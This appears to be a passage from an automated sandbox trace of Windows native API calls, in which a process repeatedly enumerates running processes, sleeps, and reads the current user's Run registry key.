[0181.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.087] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.087] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.087] NtClose (Handle=0x274) returned 0x0 [0181.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.105] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.107] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.107] NtClose (Handle=0x274) returned 0x0 [0181.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.118] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.119] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.119] NtClose (Handle=0x274) returned 0x0 [0181.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.130] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.130] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.130] NtClose (Handle=0x274) returned 0x0 [0181.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.144] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.145] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.145] NtClose (Handle=0x274) returned 0x0 [0181.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.154] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.155] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.155] NtClose (Handle=0x274) returned 0x0 [0181.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.165] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.165] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.165] NtClose (Handle=0x274) returned 0x0 [0181.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.176] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.177] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.177] NtClose (Handle=0x274) returned 0x0 [0181.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.186] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.187] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.187] NtClose (Handle=0x274) returned 0x0 [0181.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.197] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.198] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.198] NtClose (Handle=0x274) returned 0x0 [0181.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.209] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.210] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.211] NtClose (Handle=0x274) returned 0x0 [0181.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.220] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.221] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.221] NtClose (Handle=0x274) returned 0x0 [0181.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.231] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.232] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.232] NtClose (Handle=0x274) returned 0x0 [0181.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.244] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 